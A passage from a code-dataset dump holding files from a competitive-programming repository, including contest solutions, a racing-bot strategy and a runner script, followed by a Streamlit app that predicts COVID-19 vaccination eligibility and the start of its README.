attrs)\n\nfor i in range(n):\n command = input()\n if command == \"PRINT\":\n print(json.dumps(root, sort_keys=True))\n\n else:\n attrs = input().split()\n la = int(attrs[0])\n attrs = set(attrs[1:])\n l = int(input())\n j = '\\n'.join([input() for q in range(l)])\n j = json.loads(j)\n dfs(root, j, attrs)\n" }, { "alpha_fraction": 0.36624205112457275, "alphanum_fraction": 0.3747346103191376, "avg_line_length": 20.452381134033203, "blob_id": "ac6aa4fe875aa48b31b2dfa07fbd499fcb955e51", "content_id": "8272a7a8f9644ad18bb3d42dcbe9572508a61692", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1216, "license_type": "no_license", "max_line_length": 48, "num_lines": 42, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <cstdio>\r\n#include <bits/stdc++.h>\r\n \r\nusing namespace std;\r\n \r\nint main() {\r\n    int n, k;\r\n    queue<pair<int, int>> q;\r\n    scanf(\"%d%d\", &n, &k);\r\n    int t;\r\n    vector<int> a;\r\n    set<int> available;\r\n    int ans = 0;\r\n    for (int i = 0; i < n; ++i)\r\n    {\r\n        scanf(\"%d\", &t);\r\n        while (q.size() && q.front().first <= t)\r\n        {\r\n            int u = q.front().second;\r\n            a[u]--;\r\n            if (a[u] == k - 1)\r\n                available.insert(u);\r\n            q.pop();\r\n        }\r\n        int l;\r\n        if (!available.size())\r\n        {\r\n            l = a.size();\r\n            a.push_back(0);\r\n        } else\r\n            l = *available.begin();\r\n        a[l]++;\r\n        if (a[l] < k)\r\n            available.insert(l);\r\n        else\r\n            available.erase(l);\r\n        q.push({t + 1000, l});\r\n        ans = max(ans, (int)a.size());\r\n    }\r\n    printf(\"%d\\n\", ans);\r\n}\n" }, { "alpha_fraction": 0.4828571379184723, "alphanum_fraction": 0.488571435213089, "avg_line_length": 16.5, 
"blob_id": "1329ae3a7f715b39cfdaa749627e17e203fbbec7", "content_id": "0ba79ef24b65d0ffca329dbc5733f547d52ed291", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 350, "license_type": "no_license", "max_line_length": 39, "num_lines": 20, "path": "/trash/parser.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <stdio.h>\n#include <string>\n\nusing namespace std;\n\nint main()\n{\n freopen(\"in.txt\", \"r\", stdin);\n freopen(\"out.txt\", \"w\", stdout);\n string s;\n while (getline(cin, s))\n {\n if (s == \"\\n\")\n continue;\n int k = s.find(\"\\\"\");\n cout << s.substr(0, k) << endl;\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.36263737082481384, "alphanum_fraction": 0.38461539149284363, "avg_line_length": 19.16666603088379, "blob_id": "d5da0f8c7caeef873b6e60042f463a24654eeef5", "content_id": "dc70b9910646f2df8afd5afce0c834a0ba600d0b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 53, "num_lines": 18, "path": "/CodeForce/0589/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n = int(input())\na = {}\nfor i in range(n):\n s = input()\n t = s.lower().rsplit('@', 1)\n if t[1] == 'bmail.com':\n t[0] = t[0].replace('.', '').split('+', 1)[0]\n t = t[0] + t[1]\n if t in a:\n a[t].append(s)\n else:\n a[t] = [s]\nprint(len(a))\nfor x in a:\n q = str(len(a[x]))\n for y in a[x]:\n q += ' ' + y\n print(q)\n\n" }, { "alpha_fraction": 0.705050528049469, "alphanum_fraction": 0.7252525091171265, "avg_line_length": 54, "blob_id": "39d7362c1f6a9283f6bc2bd6c3639f7768ab7061", "content_id": "77fc96704058d24f72e8bcb98b1e0432c7a8de2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 495, "license_type": "no_license", "max_line_length": 152, "num_lines": 9, "path": "/setup/README.md", 
"repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "* Video: [youtube]()\n\n* System: archlinux\n* DM: [awesome](https://wiki.archlinux.org/title/awesome)\n* Browser: [vivaldi](https://wiki.archlinux.org/title/Vivaldi)\n* Vim: [vimrc](https://github.com/Igorjan94/CF/configs/vimrc)\n* Zsh: [zshrc](https://github.com/Igorjan94/CF/configs/zshrc)\n* acedit: [github](https://github.com/Igorjan94/ACedIt.git) (ensure that branch is add-test). Fork of [coderick14](https://github.com/coderick14/ACedIt)\n* cf-tool: [github](https://github.com/xalanq/cf-tool)\n" }, { "alpha_fraction": 0.39880499243736267, "alphanum_fraction": 0.44393593072891235, "avg_line_length": 32.54370880126953, "blob_id": "02e9c35c74cd7d53a764f426a7cc8b2959c09b7d", "content_id": "ca231db071327aa4d610bf1afed6e15ca1ff9fe4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 15831, "license_type": "no_license", "max_line_length": 275, "num_lines": 469, "path": "/trains/ai/cpp-cgdk/old.hpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include \"MyStrategy.h\"\n\n#define PI 3.14159265358979323846\n#define _USE_MATH_DEFINES\n#define go(p, a, b) { if (p) goto a; else goto b; }\n\n#include <bits/stdc++.h>\n//#ifdef ONLINE_JUDGE\n//#define debug 1\n//#endif\n#ifdef debug\n#include <library.h>\n#endif\n\nusing namespace model;\nusing namespace std;\n\ndouble DIST_TO_NEXT = 750;\nint COUNT_OF_FAILS = 100;\nint FORCE_BACK = 130;\nint FORCE_RIGHT = 60;\nint FORCE = 100;\nint BREAK = 30;\ndouble MAX_SPEED = 17;\nint FORCE_SLOW_DOWN = 1;\nint GLOBAL_FAIL = 2;\ndouble ANGLE_THROW = PI / 30;\ndouble FAR_FAR_AWAY = 2.0;\ndouble FAR_FAR_AWAY_VALUE = -0.25;\ndouble SO_CLOSE = 1.0;\ndouble SO_CLOSE_VALUE = 0.4;\n\nbool changed = false;\ndouble eps = 5;\ndouble power = 0.85;\ndouble distToNext = -10000, prevDistance;\nint countOfFails = 0;\nint forceBack = 0;\nint forceRight = 0;\nint force = 0;\nint prevx = 0;\nint currx = -1234;\nint 
forceSlow = 0;\nint globalFail = 0;\nint snake = 0;\ndouble turn = 0.0;\ndouble tileSize = 0.0;\nint dir[15][4];\nvector<int> dx = {1, 0, -1, 0};\nvector<int> dy = {0, 1, 0, -1};\nvector<vector<TileType>> TEMP;\nbool init = true;\n\ntemplate <typename T>\nvoid ppp(vector<vector<T>> a)\n{\n int n = a.size();\n int m = a[0].size();\n for (int j = 0; j < m; ++j)\n for (int i = 0; i < n; ++i)\n printf(\"%6d%c\", a[i][j], \"\\n \"[i != n - 1]);\n}\n\nbool isCorner(TileType a) \n{\n return !(a == VERTICAL || a == HORIZONTAL || a == CROSSROADS);\n}\n\nvoid MyStrategy::move(const Car& self, const World& world, const Game& game, Move& move) {\n if (init)\n {\n init = false;\n ppp(world.getTilesXY());\n TEMP = world.getTilesXY();\n#ifdef debug\n writeln(world.getWaypoints());\n#endif\n srand(game.getRandomSeed());\n }\n tileSize = game.getTrackTileSize();\n auto a = world.getTilesXY();\n prevx = currx;\n if (prevx == -1234)\n prevx = self.getX();\n currx = self.getX();\n if (currx - prevx != 0)\n changed = true;\n int ti = self.getNextWaypointX();\n int tj = self.getNextWaypointY();\n auto wp = world.getWaypoints();\n int waypointIndex = self.getNextWaypointIndex();\n int fi, fj, pi, pj;\n if (waypointIndex < int(wp.size()) - 1)\n {\n int cx = int(self.getX() / tileSize);\n int cy = int(self.getY() / tileSize);\n int wx1 = wp[waypointIndex][0];\n int wx2 = wp[waypointIndex + 1][0];\n int wy1 = wp[waypointIndex][1];\n int wy2 = wp[waypointIndex + 1][1];\n if (\n (cx == wx1 && cx == wx2 && ((cy < wy1 && wy1 < wy2) || (cy > wy1 && wy1 > wy2)))\n ||\n (cy == wy1 && cy == wy2 && ((cx < wx1 && wx1 < wx2) || (cx > wx1 && wx1 > wx2)))\n )\n ti = wp[++waypointIndex][0],\n tj = wp[waypointIndex][1];\n if (waypointIndex + 1 < int(wp.size()))\n fi = wp[waypointIndex + 1][0],\n fj = wp[waypointIndex + 1][1];\n }\n double targetX = (ti + 0.5) * tileSize;\n double targetY = (tj + 0.5) * tileSize;\n int si = self.getX() / tileSize;\n int sj = self.getY() / tileSize;\n int n = a.size();\n 
int m = a[0].size();\n auto ok = [&](int x, int N)\n {\n return x >= 0 && x < N;\n };\n\n auto getPath = [&](int si, int sj, int ti, int tj)\n {\n vector<vector<int>> d(n, vector<int>(m, 10000));\n vector<vector<pair<int, int>>> prev(n, vector<pair<int, int>>(m));\n d[si][sj] = 0;\n queue<pair<int, int>> q;\n q.push({si, sj});\n while (q.size())\n {\n int u = q.front().first;\n int v = q.front().second;\n q.pop();\n if (u == ti && v == tj)\n {\n vector<pair<int, int>> path;\n pair<int, int> start = {si, sj};\n while (u != start.first || v != start.second)\n path.push_back({u, v}),\n tie(u, v) = prev[u][v];\n path.push_back(start);\n reverse(path.begin(), path.end());\n return path;\n }\n for (int i = 0; i < 4; ++i)\n if (ok(u + dx[i], n) && ok(v + dy[i], m) && a[u][v] >= 0 && dir[a[u][v]][i])\n if (d[u + dx[i]][v + dy[i]] == 10000)\n d[u + dx[i]][v + dy[i]] = d[u][v] + 1,\n prev[u + dx[i]][v + dy[i]] = {u, v},\n q.push({u + dx[i], v + dy[i]});\n }\n return vector<pair<int, int>>(0);\n };\n vector<pair<int, int>> path = getPath(si, sj, ti, tj);\n for (int i = 1; i < int(path.size()) - 1; ++i)\n if (abs(path[i + 1].first - path[i - 1].first) == 1 && abs(path[i + 1].second - path[i - 1].second) == 1)\n {\n#ifdef debug\n if (debug)\n {\n vector<string> xxx(m);\n for (int i = 0; i < m; ++i)\n for (int j = 0; j < n; ++j)\n xxx[i].push_back('.');\n for (int i = 0; i < path.size(); ++i)\n xxx[path[i].second][path[i].first] = i + 48;\n xxx[sj][si] = 'S';\n xxx[path[i].second][path[i].first] = 'X';\n xxx[tj][ti] = 'F';\n //ppp(d);\n writeln();\n writeln(xxx);\n writeln();\n }\n#endif\n fi = ti;\n fj = tj;\n tie(ti, tj) = path[i];\n targetX = (path[i].first + 0.5) * tileSize;\n targetY = (path[i].second + 0.5) * tileSize;\n break;\n }\n if (path.size() >= 2)\n {\n int ai, aj, bi, bj, ci, cj;\n tie(ai, aj) = path[0];\n tie(bi, bj) = path[1];\n tie(ci, cj) = path[2];\n if (ai + 1 == ci && aj - 1 == cj)\n /* /\n / */\n {\n if (ai == bi)\n targetX = ci * tileSize,\n targetY = (bj 
+ 0.5) * tileSize;\n else\n targetX = (ci + 0.5) * tileSize,\n targetY = bj * tileSize;\n snake = true;\n }\n else\n snake = false;\n }\n else\n snake = false;\n path = getPath(si, sj, ti, tj);\n if (path.size() >= 2)\n pi = path[path.size() - 2].first,\n pj = path[path.size() - 2].second;\n else\n pi = -100500,\n pj = -100500;\n double temp = self.getDistanceTo(targetX, targetY);\n double temp2 = temp / tileSize;\n double speedModule = hypot(self.getSpeedX(), self.getSpeedY());\n prevDistance = distToNext;\n distToNext = temp;\n auto interpolationBigModule = [&](double x)\n {\n\t\tif (x > FAR_FAR_AWAY)\n\t\t return FAR_FAR_AWAY_VALUE;\n\t\tif (x < SO_CLOSE)\n\t\t return SO_CLOSE_VALUE;\n return 3.4 - 4.05 * pow(x, 1) + 1.1 * pow(x, 2);\n return 0.05 + 0.775 * pow(x, 1) - 0.6 * pow(x, 2) + 0.1 * pow(x, 3);\n return 2.38 - 11.404 * pow(x, 1) + 23.4 * pow(x, 2) - 22.24 * pow(x, 3) + 9.6 * pow(x, 4) - 1.536 * pow(x, 5) - pow(5.329070518200751, -15) * pow(x, 6);\n return + 7.16332 * pow(x, 8) - 67.0616 * pow(x, 7) + 260.855 * pow(x, 6) - 544.344 * pow(x, 5) + 655.525 * pow(x, 4) - 453.69 * pow(x, 3) + 165.888 * pow(x, 2) - 24.2604 * pow(x, 1) + 0.2; //хреново входит в поворот\n return + 1.68041 * pow(x, 7) - 14.0981 * pow(x, 6) + 47.7581 * pow(x, 5) - 82.7825 * pow(x, 4) + 76.7515 * pow(x, 3) - 36.3308 * pow(x, 2) + 7.15476 * pow(x, 1) + 0.2; //на скорости влезает, но задевает угол ~-2\n return - 0.57084 * pow(x, 10) + 10.9758 * pow(x, 9) - 91.814 * pow(x, 8) + 438.632 * pow(x, 7) - 1320.67 * pow(x, 6) + 2608.54 * pow(x, 5) - 3408.95 * pow(x, 4) + 2898.79 * pow(x, 3) - 1530.02 * pow(x, 2) + 451.546 * pow(x, 1) - 56.1279; //шикарно в большие повороты\n };\n\tauto interpolationSmallModule = [&](double x)\n\t{\n\t\tif (x > 2)\n\t\t return -0.25;\n\t\tif (x < 0.5)\n\t\t return 0.3;\n return + 5.28596 * pow(x, 8) - 49.1259 * pow(x, 7) + 189.037 * pow(x, 6) - 388.625 * pow(x, 5) + 458.98 * pow(x, 4) - 310.246 * pow(x, 3) + 110.424 * pow(x, 2) - 15.6552 * pow(x, 1) + 
0.2;//идеально при малой скорости\n\t};\n double MAAAAAGIC = interpolationBigModule(temp2);\n double nextWaypointX = targetX;\n double nextWaypointY = targetY;\n\n double cornerTileOffset = MAAAAAGIC * tileSize;\n //cout << temp / tileSize << \" \" << MAAAAAGIC << \" \" << cornerTileOffset << \"\\n\";\n auto pathtitj = getPath(ti, tj, fi, fj);\n if (pathtitj.size() >= 2)\n fi = pathtitj[1].first,\n fj = pathtitj[1].second;\n else\n fi = ti,\n fj = tj;\n //cout << si << \" \" << sj << \" \" << pi << \" \" << pj << \" \" << ti << \" \" << tj << \" \" << fi << \" \"<< fj << \"\\n\";\n#ifdef debug\n writeln(si, sj, pi, pj, ti, tj, fi, fj);\n writeln(pathtitj);\n writeln();\n#endif\n auto changeCoords = [&](int i, int j) {\n if (snake)\n return;\n if (pj == tj)\n swap(pi, fi),\n swap(pj, fj);\n switch (TEMP[i][j]) \n {\n case LEFT_TOP_CORNER:\nlt:\n TEMP[i][j] = LEFT_TOP_CORNER;\n nextWaypointX += cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case RIGHT_TOP_CORNER:\nrt:\n TEMP[i][j] = RIGHT_TOP_CORNER;\n nextWaypointX -= cornerTileOffset;\n nextWaypointY += cornerTileOffset;\n break;\n case LEFT_BOTTOM_CORNER:\nlb:\n TEMP[i][j] = LEFT_BOTTOM_CORNER;\n nextWaypointX += cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case RIGHT_BOTTOM_CORNER:\nrb:\n TEMP[i][j] = RIGHT_BOTTOM_CORNER;\n nextWaypointX -= cornerTileOffset;\n nextWaypointY -= cornerTileOffset;\n break;\n case TOP_HEADED_T:\nth:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rb, lb);\n break;\n case BOTTOM_HEADED_T:\nbh:\n if (pj == tj && pj == fj);\n else\n go(fi + 1 == ti, rt, lt);\n break;\n case RIGHT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, lb, lt);\n break;\n case LEFT_HEADED_T:\n if (pi == ti && pi == fi);\n else\n go(pj + 1 == tj, rb, rt);\n break;\n case CROSSROADS:\n cout << si << \" \" << sj << \" \" << pi << \" \" << pj << \" \" << ti << \" \" << tj << \" \" << fi << \" \"<< fj << \"\\n\";\n cout << \"CROSSROADS\\n\";\n if (pi == 
ti && pi == fi);\n else if (pj == tj && pj == fj);\n else go(pj + 1 == tj, th, bh);\n default:\n break;\n }\n //ppp(TEMP);\n //cout << \"\\n\";\n };\n changeCoords(ti, tj);\n //cout << targetX << \" \" << targetY << \"\\n\";\n //cout << nextWaypointX << \" \" << nextWaypointY << \"\\n\\n\";\n\n double angleToWaypoint = self.getAngleTo(nextWaypointX, nextWaypointY);\n auto getTurn = [&](double d)\n {\n return angleToWaypoint * d * pow(DIST_TO_NEXT / distToNext, 0.8) / PI;\n };\n\n if (forceBack)\n {\n forceBack--;\n if (forceBack == 0)\n {\n power *= -1;\n forceRight = FORCE_RIGHT;\n turn *= -1;\n }\n }\n\n else if (forceRight)\n {\n if (forceRight > FORCE_RIGHT - BREAK)\n move.setBrake(true);\n forceRight--;\n if (forceRight == 0)\n force = FORCE;\n } \n if (!forceBack && forceRight == 0)\n {\n if (changed && fabs(prevDistance - distToNext) < eps)\n {\n countOfFails++;\n {\n if (countOfFails > COUNT_OF_FAILS)\n {\n globalFail++;\n countOfFails = 0;\n forceBack = FORCE_BACK;\n turn = getTurn(32);\n if (isCorner(a[si][sj]))\n {\n //cout << \"CORNER\";\n turn = turn > 0 ? 1 : -1;\n if (globalFail > GLOBAL_FAIL)\n //cout << \"GLOBAL_FAIL\",\n turn *= -1;\n }\n else\n if (globalFail > GLOBAL_FAIL)\n //cout << \"NOT CORNER GLOBAL_FAIL\",\n turn = turn > 0 ? 
1 : -1;\n turn *= -1;\n power *= -1;\n }\n }\n //else\n //if (countOfFails > COUNT_OF_FAILS / 5)\n //{\n //forceRight = 0;\n //force = 0;\n //countOfFails = COUNT_OF_FAILS;\n //}\n }\n else\n {\n if (force)\n force--;\n if (forceSlow)\n forceSlow--;\n countOfFails = 0;\n globalFail = 0;\n\n if (forceRight == 0)\n turn = getTurn(36);\n //if (speedModule * speedModule * fabs(angleToWaypoint) > 6 * PI && distToNext < DIST_TO_NEXT || \n double dd = speedModule / MAX_SPEED;// * 1.1;\n //cout << dd << \" \" << distToNext << \"\\n\";\n //if (dd > 1)\n //dd = 6;\n if ((distToNext < tileSize * dd && distToNext > tileSize) || forceSlow)\n move.setBrake(true);\n power = 1.0;\n }\n }\n //else\n //if (changed && fabs(prevDistance - distToNext) < eps)\n //{\n //countOfFails++;\n //if (countOfFails > COUNT_OF_FAILS / 3)\n //forceRight = FORCE_RIGHT;\n //}\n //else\n //countOfFails = 0;\n move.setWheelTurn(turn);\n move.setEnginePower(power);\n for (auto car : world.getCars())\n if (!car.isTeammate())\n {\n //cout << self.getAngleTo(car) / PI * 180 << \"\\n\";\n if (self.getDistanceTo(car) <= tileSize)\n {\n if (fabs(self.getAngleTo(car)) < ANGLE_THROW && car.getDurability() > 0 && !car.isFinishedTrack())\n move.setThrowProjectile(true);\n if (self.getAngleTo(car) + ANGLE_THROW * 2 > PI || self.getAngleTo(car) - ANGLE_THROW * 2 < -PI)\n move.setSpillOil(true);\n }\n }\n if (world.getTick() > 210 && distToNext > prevDistance)\n {\n forceSlow = FORCE_SLOW_DOWN;\n if (distToNext > tileSize * 5)\n forceSlow /= 2;\n }\n if (self.getRemainingOiledTicks() > 0)\n forceSlow = 0;\n if (world.getTick() > 210 && (distToNext > prevDistance && distToNext > tileSize * 5))\n move.setUseNitro(true);\n if (world.getTick() == 140)\n move.setUseNitro(true);\n}\n\nMyStrategy::MyStrategy() \n{\n dir[1][1] = dir[1][3] = true;\n dir[2][0] = dir[2][2] = true;\n\n dir[3][0] = dir[3][1] = true;\n dir[4][1] = dir[4][2] = true;\n dir[5][0] = dir[5][3] = true;\n dir[6][2] = dir[6][3] = true;\n\n dir[7][1] = 
dir[7][2] = dir[7][3] = true;\n dir[8][0] = dir[8][1] = dir[8][3] = true;\n dir[9][0] = dir[9][2] = dir[9][3] = true;\n dir[10][0] = dir[10][1] = dir[10][2] = true;\n\n dir[CROSSROADS][0] = dir[11][1] = dir[11][2] = dir[11][3] = true;\n freopen(\"lol\", \"w\", stdout);\n}\n\n//interpolate({0.5, 0.4}, {0.65, 0.365}, {0.85, 1/3}, {1.2, 0.2}, {1.4142135624, 0}, {1.66666, -1/8}, {2, -1/4}, {2.5, -1/3}, {3, -0.365}, {3.5, -0.365}, {3.25, -0.365})\n//import re\n//print(re.sub(r'x\\^(\\d+)', r'pow(x, \\1)', re.sub(r'(\\d+) x', r'\\1 * x', input().replace(' x ', ' x^1 '))))\n" }, { "alpha_fraction": 0.3368421196937561, "alphanum_fraction": 0.5754386186599731, "avg_line_length": 14, "blob_id": "b8b71b611165fe9a80cec0718866dfaf6c8610b1", "content_id": "01ca9dfc06dffabd781fae9d433c52ebf0a5e5b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 285, "license_type": "no_license", "max_line_length": 16, "num_lines": 19, "path": "/CodeForce/1663/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "r = int(input())\nif r < 1200:\n print(1200)\nelif r < 1400:\n print(1400)\nelif r < 1600:\n print(1600)\nelif r < 1900:\n print(1900)\nelif r < 2100:\n print(2100)\nelif r < 2300:\n print(2300)\nelif r < 2400:\n print(2400)\nelif r < 2600:\n print(2600)\nelse:\n print(3000)\n" }, { "alpha_fraction": 0.49921995401382446, "alphanum_fraction": 0.5304211974143982, "avg_line_length": 44.71428680419922, "blob_id": "1f4cc8dd9d6003670694f7b290de98652f195f75", "content_id": "c87ce368eb7cc96ff08d7eab12ab0350bfcf41b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 641, "license_type": "no_license", "max_line_length": 84, "num_lines": 14, "path": "/2022/ghc/run.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "./A < ./b_better_start_small.in.txt > B.out\necho -e \"$(cat B.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat B.out)\" > B.out2\n\n./A < 
./c_collaboration.in.txt > C.out\necho -e \"$(cat C.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat C.out)\" > C.out2\n\n./A < ./d_dense_schedule.in.txt > D.out\necho -e \"$(cat D.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat D.out)\" > D.out2\n\n./A < ./e_exceptional_skills.in.txt > E.out\necho -e \"$(cat E.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat E.out)\" > E.out2\n\n./A < ./f_find_great_mentors.in.txt > F.out\necho -e \"$(cat F.out | nl | tail -1 | awk '{print $1 / 2;}')\\n$(cat F.out)\" > F.out2\n\n" }, { "alpha_fraction": 0.4691357910633087, "alphanum_fraction": 0.5925925970077515, "avg_line_length": 39.5, "blob_id": "85f1542bde57a53cc04d0b352c33eb3e5f5bfb48", "content_id": "786dd048711d3c37b970a66d7d7a09131e7a0554", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 81, "license_type": "no_license", "max_line_length": 65, "num_lines": 2, "path": "/CodeForce/0552/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "n=int(input())\nprint(sum(i*max(0,min(10**i,n+1)-10**(i-1))for i in range(1,11)))\n" } ]
487
roynozoa/Screening-apps
https://github.com/roynozoa/Screening-apps
4939d5ecd0a265cfdd07c6d6395e9dd6a7700635
9fa35dcef0762a4c3082d8b7de6e518306828a56
4834a120afb066367d0954b89a955fbe0f7d688e
refs/heads/master
2023-05-09T18:02:29.552314
2021-06-14T09:02:08
2021-06-14T09:02:08
364,173,633
0
0
null
2021-05-04T07:23:37
2021-05-04T07:24:48
2021-05-04T07:26:35
null
[ { "alpha_fraction": 0.6228548288345337, "alphanum_fraction": 0.6371895670890808, "avg_line_length": 32.92465591430664, "blob_id": "be1eea781e9bf45912969d3ac30801a2227b5a6f", "content_id": "f82d66ef26482f4fd90744d66f27baa2be324f30", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4953, "license_type": "permissive", "max_line_length": 141, "num_lines": 146, "path": "/app/app.py", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "# Screening Apps Application\n# Streamlit implementation\n\nimport streamlit as st\nimport pandas as pd\nimport numpy as np\nimport pickle\nimport matplotlib.pyplot as plt\nimport shap\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.tree import DecisionTreeClassifier\n\nst.set_option('deprecation.showPyplotGlobalUse', False)\nst.write(\"\"\"\n# COVID-19 Screening-apps\n\nThis app predicts the **COVID-19 Vaccination** Screening !!!\n\n\n\n\"\"\")\n\n# Loads dataset\ndata_df = pd.read_csv('data.csv')\ndata_df = data_df.iloc[:, 0:14]\n\n# get vaccination info\ntime_data = pd.read_csv('https://raw.githubusercontent.com/owid/covid-19-data/master/public/data/vaccinations/country_data/Indonesia.csv')\ntime_data.drop(columns=['source_url'], inplace=True)\ntime_data['date'] = pd.to_datetime(time_data['date'])\ntime_data.set_index('date', inplace=True)\ntime_data.drop(columns=['location', 'vaccine', 'total_vaccinations'], inplace=True)\nlatest_date = time_data.index[-1]\n\nst.sidebar.header('User Input Features')\n\ndef user_input_features():\n terpapar = st.sidebar.selectbox('Pernah Terpapar COVID/positif dalam 3 bulan',('Yes','No'))\n u18 = st.sidebar.selectbox('Berusia kurang dari 18 tahun',('Yes','No'))\n mengandung = st.sidebar.selectbox('Ibu yang sedang mengandung',('Yes','No'))\n tekanandarah = st.sidebar.selectbox('Tekanan darah anda saat ini diatas 180/110 mmHg',('Yes','No'))\n menyusui = st.sidebar.selectbox('Ibu yang sedang 
menyusui',('Yes','No'))\n penyakit = st.sidebar.selectbox('Mengidap salah satu penyakit ini ( PPOK, Asma, Jantung, Gangguan Ginjal, penyakit hati)',('Yes','No'))\n alergi = st.sidebar.selectbox('Memiliki riwayat alergi terhadap vaksin',('Yes','No'))\n terapi = st.sidebar.selectbox('Sedang menjalani terapi kanker',('Yes','No'))\n autoimun = st.sidebar.selectbox('Mengidap penyakit autoimun sistemik',('Yes','No'))\n pembekuan = st.sidebar.selectbox('Mengidap gangguan pembekuan darah, defisiensi imun, atau penerima produk darah/transfusi',('Yes','No'))\n epilepsi = st.sidebar.selectbox('Mengidap penyakit epilepsi/ayan',('Yes','No'))\n vaksinlain = st.sidebar.selectbox('Mendapat vaksin lain(selain COVID) selama 1 bulan terakhir',('Yes','No'))\n hivaids = st.sidebar.selectbox('Mendiap HIV-AIDS',('Yes','No'))\n diatas60 = st.sidebar.selectbox('Berusia 60 tahun keatas',('Yes','No'))\n\n data = {'terpapar': terpapar,\n 'u18': u18,\n 'mengandung': mengandung,\n 'tekanandarah': tekanandarah,\n 'menyusui': menyusui,\n 'penyakit': penyakit,\n 'alergi': alergi,\n 'terapi': terapi,\n 'autoimun': autoimun,\n 'pembekuan': pembekuan,\n 'epilepsi': epilepsi,\n 'vaksinlain': vaksinlain,\n 'hivaids': hivaids,\n 'diatas60': diatas60}\n\n features = pd.DataFrame(data, index=[0])\n \n data_cleanup = {'terpapar': {'Yes':1, 'No':0},\n 'u18': {'Yes':1, 'No':0},\n 'mengandung': {'Yes':1, 'No':0},\n 'tekanandarah': {'Yes':1, 'No':0},\n 'menyusui': {'Yes':1, 'No':0},\n 'penyakit': {'Yes':1, 'No':0},\n 'alergi': {'Yes':1, 'No':0},\n 'terapi': {'Yes':1, 'No':0},\n 'autoimun': {'Yes':1, 'No':0},\n 'pembekuan': {'Yes':1, 'No':0},\n 'epilepsi': {'Yes':1, 'No':0},\n 'vaksinlain': {'Yes':1, 'No':0},\n 'hivaids': {'Yes':1, 'No':0},\n 'diatas60': {'Yes':1, 'No':0}}\n\n features = features.replace(data_cleanup)\n return features\n\ninput_df = user_input_features()\n\n\n# Reads in saved classification model\nload_clf = pickle.load(open('clf.pkl', 'rb'))\n\n# Apply model to make predictions\nprediction = 
load_clf.predict(input_df)\nprediction_proba = load_clf.predict_proba(input_df)\n\n\nst.header('Prediction')\n\nvaccine = np.array(['Belum Bisa Divaksin', 'Bisa Divaksin'])\nst.write(vaccine[prediction])\n\nst.subheader('Prediction Probability')\nst.write(prediction_proba)\n\nst.write('---')\nst.header('Vaccination Data in Indonesia')\nst.write(f'Latest update {latest_date.strftime(\"%A, %d %B %Y\")}')\nst.write('''\nData source from [Our World in data](https://ourworldindata.org/coronavirus-source-data)\n\n''')\n\nst.line_chart(time_data)\n# explainer = shap.TreeExplainer(load_clf)\n# shap_values = explainer.shap_values(data_df)\n\n# st.header('Feature Importance')\n# plt.title('Feature Importance for COVID-19 Vaccine Screening')\n\n\n\n# plt.title('Feature importance based on SHAP values (Bar)')\n# shap.summary_plot(shap_values, data_df, plot_type=\"bar\")\n# st.pyplot()\n\nst.write('---')\n\nst.write('''\nFor mor information about COVID-19 Vaccine in Indonesia please check Vaccine Dashboard from Kementerian Kesehatan RI\n[link](https://vaksin.kemkes.go.id/#/vaccines) \n\n''')\n\nst.write('---')\n\n\n\nst.write(\"\"\"\n### Our Team :\n- Muhammad Adisatriyo Pratama\n- Stefannov\n- Surya Asmoro\n\n\"\"\")\n" }, { "alpha_fraction": 0.7012020349502563, "alphanum_fraction": 0.7309673428535461, "avg_line_length": 25.082090377807617, "blob_id": "36fea2708871afe722d292c774c10a2ece1a4571", "content_id": "2b303849d084082ce3aaa17f2cafbcfeba6689d5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3494, "license_type": "permissive", "max_line_length": 214, "num_lines": 134, "path": "/README.md", "repo_name": "roynozoa/Screening-apps", "src_encoding": "UTF-8", "text": "# Screening-apps\nAplikasi yang dapat menentukan apakah seseorang boleh mendapatkan vaksin COVID-19 atau belum berdasarkan data riwayat penyakit.\n\nMata Kuliah Manajemen Proyek TI - 2021\nOleh:\n- Stefannov\n- M. 
